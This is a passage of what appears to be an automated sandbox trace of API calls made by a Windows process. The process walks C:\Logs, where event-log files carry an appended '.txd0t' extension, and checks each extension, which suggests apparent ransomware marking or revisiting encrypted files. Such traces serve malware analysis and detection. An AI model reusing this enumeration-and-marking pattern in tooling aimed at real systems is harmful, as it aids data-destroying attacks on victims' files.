ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t", cAlternateFileName="MI4E93~1.TXD")) returned 1 [0119.098] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.098] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.098] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.098] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.098] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t" [0119.098] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t") returned=".txd0t" [0119.098] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.098] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a52a96d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t", cAlternateFileName="MICD59~1.TXD")) returned 1 [0119.098] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t", psz2=".") returned 1 [0119.098] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t", psz2="..") returned 1 [0119.098] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.098] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.098] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t" [0119.099] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t") returned=".txd0t" [0119.099] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.099] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a65bbe9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t", cAlternateFileName="MI6974~1.TXD")) returned 1 [0119.099] StrCmpW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.099] StrCmpW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.099] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.099] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.099] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.txd0t" [0119.099] PathFindExtensionW (pszPath="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t") returned=".txd0t" [0119.099] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.099] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a59d09b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Security.evtx.txd0t", cAlternateFileName="MIE488~1.TXD")) returned 1 [0119.099] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Security.evtx.txd0t", psz2=".") returned 1 [0119.099] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Security.evtx.txd0t", psz2="..") returned 1 [0119.099] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.099] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.099] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SmbClient%4Security.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.txd0t" [0119.099] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Security.evtx.txd0t") returned=".txd0t" [0119.099] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.099] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a5c32e4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t", cAlternateFileName="MIF807~1.TXD")) returned 1 [0119.099] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t", psz2=".") returned 1 [0119.099] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t", psz2="..") returned 1 [0119.099] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.099] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.099] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.txd0t" [0119.099] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t") returned=".txd0t" [0119.099] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.099] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a5c32e4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t", cAlternateFileName="MIB739~1.TXD")) returned 1 [0119.099] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t", psz2=".") returned 1 [0119.099] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t", psz2="..") returned 1 [0119.099] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.099] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.099] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t" [0119.099] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t") returned=".txd0t" [0119.099] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.099] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a71a93d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t", cAlternateFileName="MI2FCD~1.TXD")) returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.100] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.100] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.100] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.txd0t" [0119.100] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t") returned=".txd0t" [0119.100] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.100] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a71a93d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Security.evtx.txd0t", cAlternateFileName="MIC863~1.TXD")) returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Security.evtx.txd0t", psz2=".") returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Security.evtx.txd0t", psz2="..") returned 1 [0119.100] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.100] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.100] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Security.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.txd0t" [0119.100] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Security.evtx.txd0t") returned=".txd0t" [0119.100] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.100] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a60f77d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Store%4Operational.evtx.txd0t", cAlternateFileName="MIEA4D~1.TXD")) returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-Store%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-Store%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.100] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.100] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.100] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Store%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.txd0t" [0119.100] PathFindExtensionW (pszPath="Microsoft-Windows-Store%4Operational.evtx.txd0t") returned=".txd0t" [0119.100] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.100] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a65bbe9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t", cAlternateFileName="MID312~1.TXD")) returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t", psz2=".") returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t", psz2="..") returned 1 [0119.100] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.100] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.100] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t" [0119.100] PathFindExtensionW (pszPath="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t") returned=".txd0t" [0119.100] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.100] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a681f5a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t", cAlternateFileName="MIE05F~1.TXD")) returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t", psz2=".") returned 1 [0119.100] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t", psz2="..") returned 1 [0119.101] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.101] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.101] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t" [0119.101] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t") returned=".txd0t" [0119.101] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.101] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a8259fd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t", cAlternateFileName="MIC83D~1.TXD")) returned 1 [0119.101] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.101] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.101] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.101] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.101] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t" [0119.101] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t") returned=".txd0t" [0119.101] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.101] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a6a80d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t", cAlternateFileName="MI9DD8~1.TXD")) returned 1 [0119.101] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t", psz2=".") returned 1 [0119.101] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t", psz2="..") returned 1 [0119.101] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.101] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.101] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t" [0119.101] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t") returned=".txd0t" [0119.101] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.101] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a6a80d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t", cAlternateFileName="MI7D3C~1.TXD")) returned 1 [0119.101] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.101] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.101] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.101] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.101] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t" [0119.101] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t") returned=".txd0t" [0119.101] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.101] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a6ce347, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t", cAlternateFileName="MI7044~1.TXD")) returned 1 [0119.101] StrCmpW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.101] StrCmpW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.101] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.101] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.101] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.txd0t" [0119.101] PathFindExtensionW (pszPath="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t") returned=".txd0t" [0119.102] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.102] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a6f458b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t", cAlternateFileName="MIB0A2~1.TXD")) returned 1 [0119.102] StrCmpW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.102] StrCmpW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.102] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.102] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.102] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t" [0119.102] PathFindExtensionW (pszPath="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t") returned=".txd0t" [0119.102] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.102] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a71a93d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t", cAlternateFileName="MIFBDF~1.TXD")) returned 1 [0119.102] StrCmpW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t", psz2=".") returned 1 [0119.102] StrCmpW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t", psz2="..") returned 1 [0119.102] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.102] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.102] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t" [0119.102] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t") 